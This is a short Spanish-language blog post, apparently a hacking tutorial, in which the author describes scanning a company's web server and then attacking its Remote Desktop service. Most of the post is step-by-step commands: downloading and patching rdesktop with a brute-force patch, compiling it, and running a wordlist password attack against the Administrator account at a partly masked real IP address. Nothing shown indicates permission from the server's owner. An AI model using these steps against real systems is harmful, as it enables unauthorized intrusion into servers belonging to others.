Hace unas semanas escaneaba un Web Server y me sorprendí al ver que tenía muchos puertos abiertos, 110, 21, 22 25, 443, 3389, 80, 993, 995 realmente para publicitarse como una empresa sería y segura no creí que tenga un buen esquema de seguridad con muchos servicios y puertos abiertos en un mismo Server.
Decidí probar con el 3389 de Terminal Server para saber si soportaba conexión remota a través de mi conexión ADSL, pues si soportaba, solo hacía falta saber la contraseña.
Atacando al RDP MS Terminal Server usando Backtrack 4
1. Actualizamos y parchamos Rdesktop.
Descargamos:
Rdesktop 1.5
http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.5.0.tar.gz
RDP Brute force patch r805
http://www.foofus.net/jmk/tools/rdp-brute-force-r805.diff
Creamos una carpeta para las descargas
mkdir rdesk
A continuación, descomprimimos.
tar -xvzf rdesktop-1.5.0.tar.gz
cd rdesktop-1.5.0
Parchamos rdesktop para que pueda hacer el ataque de fuerza bruta
root@bt:~/rdesk/rdesktop-1.5.0# patch -p1 -i rdp-brute-force-r805.diff
patching file Makefile.in
patching file configure
patching file orders.c
patching file orders.h
patching file rdesktop.c
patching file rdesktop.h
patching file rdp.c
patching file secure.c
patching file xkeymap.c
Compilamos e instalamos
./configure
make
make install
Ahora ya tenemos la nueva versión de rdesktop lista para hacer el ataque
2. Realizando el ataque
En la línea de comandos escribimos:
#rdesktop -n Administrador -p /ruta/wordlist.lst 72.28.xxx.xxx
Etiquetas: 3389, brute force, cracking, fuerza bruta, rdesktop, RDP, Terminal Server, Windows, wordlist
